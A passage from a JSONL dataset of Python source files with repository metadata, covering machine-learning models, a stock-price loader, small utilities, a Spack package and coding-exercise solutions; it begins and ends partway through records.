self.domain_classifier[:-2](x_reverse)\n\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier[-2:](dom_head_context)\n\n self.forward_ret_dict['dom_img_preds'] = dom_img_preds\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n if 'det' not in t_mode:\n return data_dict\n\n dom_head_context = data_dict[f'dom_head_context']\n\n dom_head_context_reshape = dom_head_context.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])\n\n spatial_features_2d = torch.cat((spatial_features_2d, dom_head_context_reshape), dim=1)\n\n cls_preds = self.conv_cls(spatial_features_2d)\n box_preds = self.conv_box(spatial_features_2d)\n\n cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]\n box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]\n\n self.forward_ret_dict['cls_preds'] = cls_preds\n self.forward_ret_dict['box_preds'] = box_preds\n\n if self.conv_dir_cls is not None:\n dir_cls_preds = self.conv_dir_cls(spatial_features_2d)\n dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()\n self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds\n else:\n dir_cls_preds = None\n\n if self.training:\n if pseudo:\n pseudo_weights = data_dict['pseudo_weights']\n else:\n pseudo_weights = None\n\n targets_dict = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n pseudo=pseudo,\n pseudo_weights=pseudo_weights\n )\n\n self.forward_ret_dict.update(targets_dict)\n\n if not self.training or self.predict_boxes_when_training:\n batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(\n batch_size=data_dict['batch_size'],\n cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds\n )\n data_dict['batch_cls_preds'] = batch_cls_preds\n data_dict['batch_box_preds'] = batch_box_preds\n data_dict['cls_preds_normalized'] = False\n\n if self.rangeinv:\n # print(\"spatial_features_2d\", spatial_features_2d.shape) #512,128,128\n thresh = self.rm_thresh\n\n start_dim = int(spatial_features_2d.shape[-1]/4.)\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n end_dim = start_dim+int(spatial_features_2d.shape[-1]/2.)\n\n near_idx = torch.LongTensor([i for i in range(start_dim, mid_dim-thresh)]+[i for i in range(mid_dim+thresh, end_dim)])\n far_idx = torch.LongTensor([i for i in range(start_dim)]+[i for i in range(end_dim, spatial_features_2d.shape[-1])])\n\n if self.keep_x:\n near_feat_2d = spatial_features_2d[:,:,:,near_idx]\n far_feat_2d = spatial_features_2d[:,:,:, far_idx]\n elif self.keep_y:\n near_feat_2d = spatial_features_2d[:,:,near_idx,:]\n far_feat_2d = spatial_features_2d[:,:,far_idx,:]\n\n near_feat_2d_reverse = grad_reverse(near_feat_2d, l*-1)\n range_pred_near = self.conv_range(near_feat_2d_reverse)\n # print(\"near_range_pred\", near_range_pred.shape)\n far_feat_2d_reverse = grad_reverse(far_feat_2d, l*-1)\n range_pred_far = self.conv_range(far_feat_2d_reverse)\n # print(\"far_range_pred\", far_range_pred.shape)\n\n range_labels_near = torch.ones((range_pred_near.shape), dtype=torch.float32, device=spatial_features_2d.device)\n\n range_labels_far = torch.zeros((range_pred_far.shape), dtype=torch.float32, device=spatial_features_2d.device)\n\n targets_dict_range = {\n 'range_pred_near': range_pred_near,\n 'range_pred_far': range_pred_far,\n 'range_labels_near': range_labels_near,\n 'range_labels_far': range_labels_far,\n }\n self.forward_ret_dict.update(targets_dict_range)\n\n\n return data_dict","repo_name":"zhangweichen2006/SRDAN_Open","sub_path":"pcdet/models/dense_heads/anchor_head_single_range_guidance.py","file_name":"anchor_head_single_range_guidance.py","file_ext":"py","file_size_in_byte":20599,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"45"} +{"seq_id":"4941482715","text":"import argparse\nimport time\n\n\ndef main(args):\n print(\"=\" * 40, \" FILE I/O \", \"=\" * 40)\n start_time0 = time.time()\n\n if args.test:\n input_path = \"day14/day14_test.txt\"\n else:\n input_path = \"day14/day14_input.txt\"\n\n with open(input_path, \"r\") as f:\n lines = f.readlines()\n\n for line in lines:\n pass\n\n stop_time0 = time.time()\n print(f\"File IO finished in {(stop_time0 - start_time0) * 1000} milliseconds\")\n\n print(\"=\" * 40, \" PART ONE \", \"=\" * 40) #### PART 1 ####\n start_time1 = time.time()\n answer = \"PLACEHOLDER\"\n stop_time1 = time.time()\n print(\n f\"Final answer: {answer}, found in {(stop_time1 - start_time1) * 1000} milliseconds\"\n )\n\n print(\"=\" * 40, \" PART TWO \", \"=\" * 40) #### PART 2 ####\n start_time2 = time.time()\n answer = \"PLACEHOLDER\"\n stop_time2 = time.time()\n print(\n f\"Final answer: {answer}, found in {(stop_time2 - start_time2) * 1000} milliseconds\"\n )\n\n\nif __name__ == \"__main__\":\n arg = argparse.ArgumentParser()\n arg.add_argument(\"--test\", action=\"store_true\")\n\n args = arg.parse_args()\n\n main(args)\n","repo_name":"OllieOA/advent_of_code_2021","sub_path":"daynum/daynum.py","file_name":"daynum.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74872662216","text":"#!/usr/bin/env python3\nimport sqlite3, config\nimport alpaca_trade_api as tradeapi\nimport numpy as np\nimport tulipy as ti\nfrom datetime import date, timedelta\n\nconnection = sqlite3.connect(config.DB_FILE)\n\nconnection.row_factory = sqlite3.Row\n\ncursor = connection.cursor()\n\ncursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock\n\"\"\")\n\nrows = cursor.fetchall()\n\nsymbols = []\nstock_dict = {}\nfor row in rows:\n symbol = row['symbol']\n symbols.append(symbol)\n stock_dict[symbol] = row['id']\n\napi = tradeapi.REST(config.API_KEY, config.SECRET_KEY, base_url=config.API_URL)\n\nlatest_day=date.today()-timedelta(days=1)\n#remember to edit this line according to when you are running cron job\n\ncursor.execute(\"\"\"\n DELETE FROM stock_price\n\"\"\")\n\nchunk_size = 200\nfor i in range(0, len(symbols), chunk_size):\n symbol_chunk = symbols[i:i+chunk_size]\n barsets = api.get_barset(symbol_chunk, 'day')\n for symbol in barsets:\n \n print(f\"processing symbol {symbol}\")\n\n # print(barsets[symbol])\n\n recent_closes = [bar.c for bar in barsets[symbol]]\n\n # print(rsi_14)\n # print(sma_20)\n # print(sma_50)\n\n for bar in barsets[symbol]:\n stock_id = stock_dict[symbol]\n \n # print(latest_day.isoformat())\n # print(bar.t.date().isoformat())\n # print(type(latest_day.isoformat()))\n # print(type(bar.t.date().isoformat()))\n\n if len(recent_closes)>=50 and latest_day.isoformat() == bar.t.date().isoformat():\n\n sma_20 = ti.sma(np.array(recent_closes), period=20)[-1]\n sma_50 = ti.sma(np.array(recent_closes), period=50)[-1]\n rsi_14 = ti.rsi(np.array(recent_closes), period=14)[-1]\n else:\n sma_20, sma_50, rsi_14 = None, None, None\n\n cursor.execute(\"\"\"\n INSERT INTO stock_price (stock_id, date, open, high, low, close, volume, sma_20, sma_50, rsi_14)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\", (stock_id, bar.t.date(), bar.o, bar.h, bar.l, bar.c, bar.v, sma_20, sma_50, rsi_14))\nconnection.commit()\n\n# barsets = api.get_barset(['Z'], 'minute')\n# # print(barsets)\n\n# for symbol in barsets:\n# print(f\"processing symbol {symbol}\")\n\n# for bar in barsets[symbol]:\n# print (bar.t, bar.o, bar.h, bar.l, bar.c, bar.v)","repo_name":"amitrahman1026/algotrading","sub_path":"fullstack-trading-app/populate_prices.py","file_name":"populate_prices.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36545128027","text":"import os\nimport sys\n\n\n# python main,py dir_name phrase\n## return list of files of phrase found\n\n\nhead_list = []\n\ndef searchfile(phrase,file):\n\ttry:\n\t\tfile = open(file,\"r\")\n\t\tdata = file.read()\n\t\tresult = data.find(phrase)\n\t\tif result == -1:\n\t\t\treturn False\n\t\treturn True\n\texcept:\n\t\tprint(\"Error reading file.\")\n\n\ndef search_dir(dir,phrase):\n\tdata = os.listdir(dir)\n\tfile = []\n\tfolder = []\n\trest = []\n\tfor element in data:\n\t\tif os.path.isdir(dir +\"/\" + element):\n\t\t\tfolder.append(dir +\"/\" + element)\n\n\t\tif os.path.isfile(dir +\"/\" + element):\n\t\t\tfile.append(dir +\"/\" + element)\n\n\n\tfor f in file:\n\t\tif searchfile(phrase,f):\n\t\t\thead_list.append(f)\n\t\n\tif len(folder) == 0:\n\t\treturn head_list\n\n\tfor d in folder:\n\t\tsearch_dir(d,phrase)\n\n\t\n\ndir_name = sys.argv[2]\nphrase = sys.argv[1]\n\n\nsearch_dir(dir_name,phrase)\n\nfor element in head_list:\n\tprint(element)","repo_name":"nakul-shahdadpuri/random_stuff_in_python","sub_path":"funcfind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20936405633","text":"import numpy as np\nimport torch\n\nfrom autodo.stage_three_dataset import StageThreeDataset\nfrom autodo.stage_three_model import MyUNet\n\n\nclass StageThreePredictor:\n def __init__(self, model_file, gpu=False):\n self.device = torch.device('cuda:0' if gpu else 'cpu')\n self.net = MyUNet(3, self.device).to(self.device)\n self.net.load_state_dict(torch.load(model_file))\n self.net.eval()\n\n def predict(self, filenames, xcenters_per_image, ycenters_per_image):\n input_data = np.array([\n StageThreeDataset.make_input(filename, xcenters, ycenters)\n for filename, xcenters, ycenters in zip(filenames, xcenters_per_image, ycenters_per_image)\n ])\n input_tensor = torch.from_numpy(input_data).float().to(self.device)\n outputs = self.net(input_tensor)\n return [\n StageThreeDataset.decode_output(output, xcenters, ycenters)\n for output, xcenters, ycenters in zip(outputs, xcenters_per_image, ycenters_per_image)\n ]\n","repo_name":"MatthewScholefield/autodo","sub_path":"autodo/stage_three_predictor.py","file_name":"stage_three_predictor.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"8036965244","text":"import numpy as np\n\ndef fetchData(filename, x_beg, x_size, y_beg, y_size):\n raw = np.loadtxt(filename)\n x = raw[:,x_beg:x_beg + x_size]\n y = raw[:,y_beg:y_beg + y_size]\n ave = np.average(y)\n y = [[1] if p[0] > ave else [-1] for p in y]\n y = np.array(y)\n return x,y","repo_name":"KnowingNothing/AdaBoost","sub_path":"dataOp.py","file_name":"dataOp.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72362785095","text":"import gensim, logging\nimport smart_open, os\nimport nltk\nimport multiprocessing\nimport string\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nsource_dir = '/home/tuong/Downloads/Text_Classification/'\n\ndef get_filepaths(directory):\n \"\"\"\n Load data file paths\n :param directory:\n :return:\n \"\"\"\n file_paths = []\n for root, directories, files in os.walk(directory):\n for filename in files:\n file_path = os.path.join(root, filename)\n file_paths.append(file_path)\n return file_paths\n\ndef preprocess():\n filenames = get_filepaths(source_dir+'data')\n vocab = dict()\n with open(source_dir + 'metadata/data.vn.txt', 'w') as f:\n for file in filenames:\n with open(file, 'r') as fr:\n for sent in nltk.sent_tokenize(fr.read()):\n if sent != '\\n':\n f.write(sent+'\\n')\n for w in nltk.word_tokenize(sent):\n if w not in string.punctuation:\n if w not in vocab:\n vocab[w.lower()]=1\n else: vocab[w.lower()]+=1\n with open(source_dir+'metadata/vocab.txt', 'w') as f:\n for w in vocab:\n f.write(w+' '+str(vocab[w])+'\\n')\n\ndef train():\n # sentences = gensim.models.word2vec.LineSentence(source_dir+'metadata/data.vn.txt')\n sentences = gensim.models.word2vec.Text8Corpus(source_dir+'metadata/data.vn.txt')\n model = gensim.models.Word2Vec(sentences, size=2, workers=multiprocessing.cpu_count(), min_count=1)\n model.save(source_dir+'word2vec/word2vec.vn.bin')\n print(model.wv.vocab)\n\ndef load(dir):\n model = gensim.models.Word2Vec.load(dir)\n vector = {}\n for word in model.wv.vocab.keys():\n vector[word] = model[word]\n\n print(vector)\n\nif __name__=='__main__':\n #preprocess()\n #train()\n load(source_dir+'word2vec/word2vec.vn.bin')","repo_name":"lqtuong/word2vec","sub_path":"word2vec_gensim.py","file_name":"word2vec_gensim.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73660136775","text":"import pandas as pd\n\n# This file is purely meant for data analysis\n\ndata_df = pd.read_excel('./data/existing-customers.xlsx')\n\n# Search for missing values\ntotal = data_df.isnull().sum().sort_values(ascending=False)\npercent_1 = data_df.isnull().sum()/data_df.isnull().count()*100\npercent_2 = (round(percent_1, 1)).sort_values(ascending=False)\nmissing_data = pd.concat([total, percent_2], axis=1, keys=['Total', '%'])\nprint(missing_data.head(16))\n\n# Race analysis to see whether race is a good feature to consider for predicting income (looking for bias)\ntotal = data_df['race'].value_counts()\npercentage = round((data_df['race'].value_counts()/len(data_df))*100)\nrace_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(race_count)\n\n# sex\ntotal = data_df['sex'].value_counts()\npercentage = round((data_df['sex'].value_counts()/len(data_df))*100)\nsex_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(sex_count)\n\n# workclass\ntotal = data_df['workclass'].value_counts()\npercentage = round((data_df['workclass'].value_counts()/len(data_df))*100)\nworkclass_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(workclass_count)\n\n# native country\ntotal = data_df['native-country'].value_counts()\npercentage = round((data_df['native-country'].value_counts()/len(data_df))*100)\ncountry_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(country_count)\n\n# class\ntotal = data_df['class'].value_counts()\npercentage = round((data_df['class'].value_counts()/len(data_df))*100)\nclass_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\nprint(class_count)\n\n# occupation\ntotal = data_df['occupation'].value_counts()\npercentage = round((data_df['occupation'].value_counts()/len(data_df))*100)\noccupation_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(occupation_count)\n\n# marital-status\ntotal = data_df['marital-status'].value_counts()\npercentage = round((data_df['marital-status'].value_counts()/len(data_df))*100)\nmarital_status_count = pd.concat([total, percentage], axis=1, keys=['Total', '%'])\n# print(marital_status_count)\n","repo_name":"JasperDeLaet/DataminingClassification","sub_path":"src/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16011276648","text":"from spack import *\nfrom spack.environment import *\n\nclass Lalinference(Package):\n \"\"\"LSC Algorithm Library - Inference\n LIGO Scientific Collaboration Algorithm Library - Inference containing \\\n routines for Bayesian inference data analysis.\n \"\"\"\n\n homepage = \"https://www.lsc-group.phys.uwm.edu/daswg/projects/lalsuite.html\"\n url = \"http://software.ligo.org/lscsoft/source/lalsuite/lalinference-1.6.0.tar.xz\"\n\n version('1.9.1', '2700ed18099222b12ac4e54140a0aa4b')\n version('1.9.0', '2f38e128937d16fe2f110b18faf62234')\n version('1.8.2', '27a44963832ad7e24de22a05545baac8')\n version('1.8.1', '8fa4d3fe315b9c4d5b91c47dab9448e5')\n version('1.8.0', '6a7baa397b93390f8cdd2ba8676a5ace')\n version('1.7.0', '29ebf36a1e989f6a6e2ad2b12050244c')\n version('1.6.0', 'e4f68dc673dd9a24730e2e8473c363b3')\n\n variant('swig_python', True, 'Generate SWIG bindings for Python')\n variant('octave', False, 'Generate SWIG bindings for Octave')\n variant('fastgsl', False, 'Enable fast/inline GSL code')\n variant('hdf5', default=True)\n variant('openmp', True, 'Enable OpenMP')\n\n extends(\"python\")\n\n depends_on(\"chealpix\")\n depends_on(\"gsl\")\n depends_on(\"metaio\")\n depends_on(\"libxml2\")\n depends_on(\"py-healpy\")\n\n depends_on('swig', when='+swig_python')\n depends_on('swig', when='+octave')\n depends_on('py-numpy', when='+swig_python')\n depends_on('octave+fftw', when='+octave')\n\n depends_on('lalframe')\n depends_on('lalmetaio')\n depends_on('lal')\n depends_on('lalinspiral')\n depends_on('lalburst')\n depends_on('lalxml')\n depends_on('lalpulsar')\n depends_on('lalsimulation')\n\n \n# for p in ['+swig_python', '~swig_python']:\n# for o in ['+octave', '~octave']:\n# depends_on('lalframe' + p + o, when=p + o)\n# depends_on('lalmetaio' + p + o, when=p + o)\n# for f in ['+fastgsl', '~fastgsl']:\n# depends_on('lal' + p + o + f, when=p + o + f)\n# depends_on('lalinspiral' + p + o + f, when=p + o + f)\n# depends_on('lalburst' + p + o + f, when=p + o + f)\n# depends_on('lalxml' + p + o + f, when=p + o + f)\n#\n# for m in ['+openmp', '~openmp']:\n# depends_on('lalpulsar' + p + o + f + m, when=p + o + f + m)\n# depends_on('lalsimulation' + p + o + f + m, when=p + o + f + m)\n\n def install(self, spec, prefix):\n config_args = ['--prefix=%s' % prefix]\n\n if '+swig_python' in spec:\n config_args.append('--enable-swig-python')\n else:\n config_args.append('--disable-swig-python')\n\n if '+octave' in spec:\n config_args.append('--enable-swig-octave')\n else:\n config_args.append('--disable-swig-octave')\n\n if '+fastgsl' in spec:\n config_args.append('--enable-fast-gsl')\n else:\n config_args.append('--disable-fast-gsl')\n\n if '+hdf5' in spec:\n config_args.append('--with-hdf5=%s' % (join_path(spec['hdf5'].prefix.bin,'h5cc')))\n else:\n config_args.append('--with-hdf5=no')\n\n if '+openmp' in spec:\n config_args.append('--enable-openmp')\n else:\n config_args.append('--disable-openmp')\n\n configure(*config_args)\n\n make()\n make(\"install\")\n\n def setup_environment(self, spack_env, run_env):\n run_env.set('LALINFERENCE_PREFIX', self.spec.prefix)\n run_env.set(\"LALINFERENCE_DATADIR\",\n join_path(self.prefix.share, 'lalinference'))\n# source_file = join_path(self.prefix.etc,'lalinference-user-env.sh')\n# if can_access(source_file):\n# source_file_env = EnvironmentModifications.from_sourcing_files(source_file)\n# run_env.extend(source_file_env)\n#\n# run_env.set('LALINFERENCE_PREFIX', self.spec.prefix)\n# run_env.set(\"LALINFERENCE_DATADIR\",\n# join_path(self.prefix.share, 'lalinference'))\n#\n# # This step is required to overcome a restriction in \n# # \"EnvironmentModifications.from_sourcing_files\" that does not properly\n# # handle paths which have no initial value.\n# if '+octave' in self.spec:\n# source_file_env = EnvironmentModifications.from_sourcing_files(\n# join_path(self.prefix.etc,'lalinference-user-env.sh'))\n# modifications = source_file_env.group_by_name()\n# octave_path = modifications['OCTAVE_PATH'][0].value.split(':',1)[0]\n# run_env.append_path(\"OCTAVE_PATH\", octave_path)\n \n","repo_name":"paulhopkins/lvc-spack","sub_path":"packages/lalinference/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43229350320","text":"\"\"\"\nPapers:\n [1] Mikolov T, Chen K, Corrado G, et al. Efficient Estimation of Word Representations in Vector Space[J]. Computer Science, 2013. (https://arxiv.org/pdf/1301.3781.pdf)\n [2] Mikolov T, Sutskever I, Chen K, et al. Distributed Representations of Words and Phrases and their Compositionality[J]. Advances in Neural Information Processing Systems, 2013, 26:3111-3119. (https://arxiv.org/pdf/1310.4546.pdf)\n\"\"\"\n\nfrom __future__ import division\nimport sys\nimport datetime\nimport numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Embedding, dot, Reshape, Dense, Merge, Activation\n\nimport utils\n\nclass SkipgramNEG(object):\n \"\"\"\n Skipgram model with negative sampling to speed up.\n\n Methods:\n train():\n train_by_file():\n save_as_w2v_format():\n \"\"\"\n def __init__(self, corpus_file, embedding_dim, min_word_freq=3, \n context_window=2, seperator=' ', negative_sample_rate=1):\n \"\"\"\n Args:\n context_window: int, furthest distance from target word\n corpus_file: string, corpus to train word embedding\n embedding_dim: int, word embedding dimension\n negative_sample_rate: int, negative_sample for each train sample = positive_sample_cnt * negative_sample_rate\n \"\"\"\n self._corpus_file = corpus_file\n self._embedding_dim = embedding_dim\n self._seperator = seperator\n self._min_word_freq = min_word_freq\n self._context_window = context_window\n self._negative_sample_rate = negative_sample_rate\n\n self._word_id_dict, self._id_word_dict, self._word_counter = utils.build_word_dict_by_file(corpus_file, \n seperator, min_word_freq)\n self._vocab_size = len(self._word_id_dict)\n self._model = self._init_model(self._vocab_size, embedding_dim)\n\n def _init_model(self, vocab_size, embedding_dim=100, ):\n # Functional paradigm\n target = Input(shape=(1,), name='target')\n context = Input(shape=(1,), name='context')\n shared_embedding = Embedding(vocab_size, embedding_dim, input_length=1, name='shared_embedding')\n embedding_target = shared_embedding(target)\n embedding_context = shared_embedding(context)\n merged_vector = dot([embedding_target, embedding_context], axes=-1)\n reshaped_vector = Reshape((1,), input_shape=(1,1))(merged_vector)\n prediction = Dense(1, input_shape=(1,), activation='sigmoid')(reshaped_vector)\n\n model = Model(inputs=[target, context], outputs=prediction)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n return model\n\n def train(self, epochs=5, batch_size=512, shuffle=True):\n negative_sample_array_size = 100000000 # due to paper [1]\n negative_sample_array = utils.build_negative_sample_array(self._word_counter, self._word_id_dict,\n negative_sample_array_size)\n\n for epoch_id in xrange(epochs):\n # train by batch\n batch_id = 0\n x_batch = [[],[]]\n y_batch = []\n loss_list = []\n reader = utils.NEG_reader_creator(self._word_id_dict, \n self._corpus_file, negative_sample_array, self._word_counter,\n self._context_window, self._negative_sample_rate, self._seperator)\n if shuffle:\n reader = utils.shuffle(reader, batch_size*30)\n for word_ids, label in reader():\n batch_id += 1\n x_batch[0].append(word_ids[0])\n x_batch[1].append(word_ids[1])\n y_batch.append(label)\n if batch_id % (batch_size*100) == 0:\n sys.stdout.write('\\r[epoch #%d] batch #%d, train loss:%s' % (epoch_id, \n batch_id, np.mean(loss_list)))\n sys.stdout.flush()\n loss_list = []\n if batch_id % batch_size == 0:\n X = [np.array(x_batch[0]), np.array(x_batch[1])]\n loss = self._model.train_on_batch(X, np.array(y_batch))\n loss_list.append(loss)\n x_batch = [[],[]]\n y_batch = []\n sys.stdout.write('\\n%s [epoch #%d] done\\n' % (\n datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), epoch_id))\n\n def save_as_w2v_format(self, output_file, use_word_id_key=False):\n \"\"\"\n Store word embedding result to text file.\n\n Args:\n output_file: string, w2v file output path\n use_word_id_key: bool, if true, key is word_id; other wise key is word\n Returns:\n int, 0 success, else fail\n \"\"\"\n with open(output_file, 'w') as fwrite:\n fwrite.write('%d %d\\n' % (len(self._word_id_dict), self._embedding_dim))\n for idx, vec in enumerate(self._model.layers[2].get_weights()[0].tolist()):\n if use_word_id_key:\n fwrite.write('%d %s\\n' % (idx, ' '.join([str(_) for _ in vec])))\n else:\n fwrite.write('%s %s\\n' % (self._id_word_dict[idx], ' '.join([str(_) for _ in vec])))\n","repo_name":"lujiaying/keras-word2vec","sub_path":"word2vec/skipgram.py","file_name":"skipgram.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27287775333","text":"import logging\n\nfrom django.core.management.base import BaseCommand\n\nfrom couchdbkit.exceptions import BulkSaveError\n\nfrom dimagi.utils.couch.database import get_db\n\nfrom corehq.util.couch import categorize_bulk_save_errors\n\nlogger = logging.getLogger(__name__)\n\n\ndef bulk_delete(db, docs):\n if not docs:\n return\n\n logger.info(\"Deleting {} doc revisions\".format(len(docs)))\n try:\n db.bulk_delete(docs)\n except BulkSaveError as e:\n errors = categorize_bulk_save_errors(e)\n successes = errors.pop(None, [])\n conflicts = errors.pop('conflict', [])\n logger.error(\"BulkSaveError: {} successful, {} conflicts\".format(len(successes), len(conflicts)))\n for error, results in errors.items():\n logger.error(results)\n else:\n logger.info('{} doc revisions deleted'.format(len(docs)))\n\n\nclass Command(BaseCommand):\n help = 'Delete document conflicts'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--batch_size',\n action='store',\n type=int,\n dest='batch',\n default=500,\n help=\"Only process this many docs.\",\n )\n\n def handle(self, **options):\n db = get_db()\n while True:\n results = db.view('doc_conflicts/conflicts', reduce=False, limit=options['batch'], include_docs=True, conflicts=True)\n total = results.total_rows\n if not total:\n logger.info('Document conflict deletion complete')\n return\n logger.info('Processing {} of {} docs'.format(len(results), total))\n to_delete = []\n for row in results:\n doc = row['doc']\n conflicts = doc.get('_conflicts', [])\n doc_id = doc['_id']\n logger.info('Deleting {} conflicts for doc: {}'.format(len(conflicts), doc_id))\n for rev in conflicts:\n to_delete.append({\n '_id': doc_id,\n '_rev': rev\n })\n if len(to_delete) > 100:\n bulk_delete(db, to_delete)\n to_delete = []\n\n bulk_delete(db, to_delete)\n","repo_name":"dimagi/commcare-hq","sub_path":"corehq/apps/cleanup/management/commands/delete_doc_conflicts.py","file_name":"delete_doc_conflicts.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"38703035123","text":"import sys\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef is_valid_bst_node_helper(node, lb, ub):\n\n if node and node.val <= ub and node.val >= lb:\n return is_valid_bst_node_helper(node.left, lb, node.val) and \\\n is_valid_bst_node_helper(node.right, node.val, ub)\n\n return not node # if node is None, it's a valid BST\n\n\ndef is_valid_bst(root):\n return is_valid_bst_node_helper(root, -sys.maxsize, sys.maxsize)\n\n\n# Tests\n\n\nassert is_valid_bst(None)\n\na = Node(3)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(3)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert is_valid_bst(a)\n\n\na = Node(1)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(3)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert not is_valid_bst(a)\n\na = Node(3)\nb = Node(2)\nc = Node(6)\nd = Node(1)\ne = Node(4)\nf = Node(4)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nassert not is_valid_bst(a)\n","repo_name":"ngiengkianyew/daily-coding-problem","sub_path":"solutions/problem_089.py","file_name":"problem_089.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"45"} +{"seq_id":"4538956578","text":"from threading import Thread\nimport numpy as np\nimport math\nimport cv2\n\nIMG_SIZE = 1000\nRADIAN_CONV = math.pi / 180\n\ndef draw_text(img, text,\n font=cv2.FONT_HERSHEY_PLAIN,\n pos=(0, 0),\n font_scale=3,\n font_thickness=2,\n text_color=(0, 255, 0),\n text_color_bg=(0, 0, 0)\n ):\n\n x, y = pos\n text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)\n text_w, text_h = text_size\n cv2.rectangle(img, (x-5,y-5), (x + text_w+5, y + text_h+5), text_color_bg, -1)\n cv2.putText(img, text, (x, y + text_h + font_scale - 1), font, font_scale, text_color, font_thickness)\n\n return text_size\n\nclass ComputingUnit:\n def __init__(self, raw_points, multi_factor, max_range, image_size=IMG_SIZE):\n self.raw_points = raw_points\n self.multi_factor = multi_factor\n self.image_size = image_size\n self.center = self.image_size // 2\n self.max_range = max_range\n self.img = np.zeros((image_size, image_size, 3), np.uint8)\n\n\n def compute(self):\n self.img[:, :, :] = 0\n\n min_distance = np.min(self.raw_points[:, 0])\n pos = (20, 30)\n show_txt = \"Minimum Distance: %.1f cm\" % (min_distance / 10)\n\n for i in range(self.raw_points.shape[0]):\n (distance, confidence) = self.raw_points[i]\n angle = i / 2\n\n show_distance = distance / self.max_range * (self.image_size)\n\n color = (255, 0, 0)\n line_color = (0, 125, 125)\n if distance <= (min_distance+30):\n color = (0, 0, 255)\n line_color = (0, 0, 255)\n\n radian = angle * RADIAN_CONV\n\n x = int(show_distance * math.cos(radian) + (self.center))\n y = int(show_distance * math.sin(radian) + (self.center))\n\n cv2.line(self.img, (self.center, self.center), (x, y), line_color, 2)\n cv2.circle(self.img, (x, y), 2, color, 2)\n\n cv2.circle(self.img, (self.center, self.center), 2, (0, 255, 0), 4)\n draw_text(self.img, show_txt, pos=pos, font_scale=2, font_thickness=3, text_color=(255,0,0), text_color_bg=(255,255,255))\n","repo_name":"Y2Nk4/LiDAR_Obstacle_Detection","sub_path":"drivers/ComputingUnit.py","file_name":"ComputingUnit.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"31177353992","text":"class Solution:\n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n count = 1\n curr = head\n\n if left == right:\n return head\n\n else:\n while count < left:\n count += 1\n curr = curr.next\n\n while count < right:\n swap = curr\n for _ in range(right-count):\n swap = swap.next\n curr.val, swap.val = swap.val, curr.val\n curr = curr.next\n count += 1\n right -= 1\n\n return 